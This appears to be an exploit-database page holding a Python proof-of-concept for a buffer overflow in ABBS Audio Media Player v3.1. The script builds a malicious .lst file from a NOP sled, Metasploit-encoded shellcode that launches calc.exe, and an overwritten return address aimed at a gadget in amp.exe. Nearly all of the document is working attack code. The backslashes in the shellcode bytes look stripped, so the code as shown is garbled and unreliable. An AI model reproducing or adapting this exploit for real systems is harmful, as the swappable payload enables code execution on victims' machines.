[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : ABBS Audio Media Player v3.1 (.lst) Buffer Overflow
# Published : 2013-05-04
# Author :
# Previous Title : AudioCoder .M3U Buffer Overflow
# Next Title : AudioCoder 0.8.18 - Buffer Overflow Exploit (SEH)


#!/usr/bin/python
 
# Exploit Title: ABBS Audio Media Player v3.1 (.lst) Buffer Overflow
# Version:       v3.1
# Date:          2013-05-04
# Author:        Julien Ahrens (@MrTuxracer)
# Homepage:      http://www.inshell.net
# Software Link: http://abbs.qsnx.net/
# Tested on:     Windows XP SP3 DE
#                Windows 7 SP1 64Bit DE
#                Windows 8 32/64Bit DE/EN
# Notes:         This exploit is for the current version and WinALL.
# Howto:         Open .lst

from struct import pack
 
file="exploit.lst"

# windows/exec CMD=calc.exe 
# Encoder: x86/shikata_ga_nai
# powered by Metasploit 
# msfpayload windows/exec CMD=calc.exe R | msfencode -b 'x00x0ax0d'

shellcode = ("xdaxcaxbbxfdx11xa3xaexd9x74x24xf4x5ax31xc9" +
"xb1x33x31x5ax17x83xc2x04x03xa7x02x41x5bxab" +
"xcdx0cxa4x53x0ex6fx2cxb6x3fxbdx4axb3x12x71" +
"x18x91x9exfax4cx01x14x8ex58x26x9dx25xbfx09" +
"x1ex88x7fxc5xdcx8ax03x17x31x6dx3dxd8x44x6c" +
"x7ax04xa6x3cxd3x43x15xd1x50x11xa6xd0xb6x1e" +
"x96xaaxb3xe0x63x01xbdx30xdbx1exf5xa8x57x78" +
"x26xc9xb4x9ax1ax80xb1x69xe8x13x10xa0x11x22" +
"x5cx6fx2cx8bx51x71x68x2bx8ax04x82x48x37x1f" +
"x51x33xe3xaax44x93x60x0cxadx22xa4xcbx26x28" +
"x01x9fx61x2cx94x4cx1ax48x1dx73xcdxd9x65x50" +
"xc9x82x3exf9x48x6ex90x06x8axd6x4dxa3xc0xf4" +
"x9axd5x8ax92x5dx57xb1xdbx5ex67xbax4bx37x56" +
"x31x04x40x67x90x61xbex2dxb9xc3x57xe8x2bx56" +
"x3ax0bx86x94x43x88x23x64xb0x90x41x61xfcx16" +
"xb9x1bx6dxf3xbdx88x8exd6xddx4fx1dxbax0fxea" +
"xa5x59x50")

junk1="x90" * (4108 - len(shellcode))
eip=pack('<L',0x00412c91) # ADD ESP,14 # POP EDI # POP ESI # POP EBX # RETN  ** [amp.exe] **  
junk2="x90" * 4
evil="x00" * 4 # Terminat0r
poc=junk1 + shellcode + eip + junk2 + evil


try:
    print "[*] Creating exploit file...n";
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print "[*] File successfully created!";
except:
    print "[!] Error while creating file!";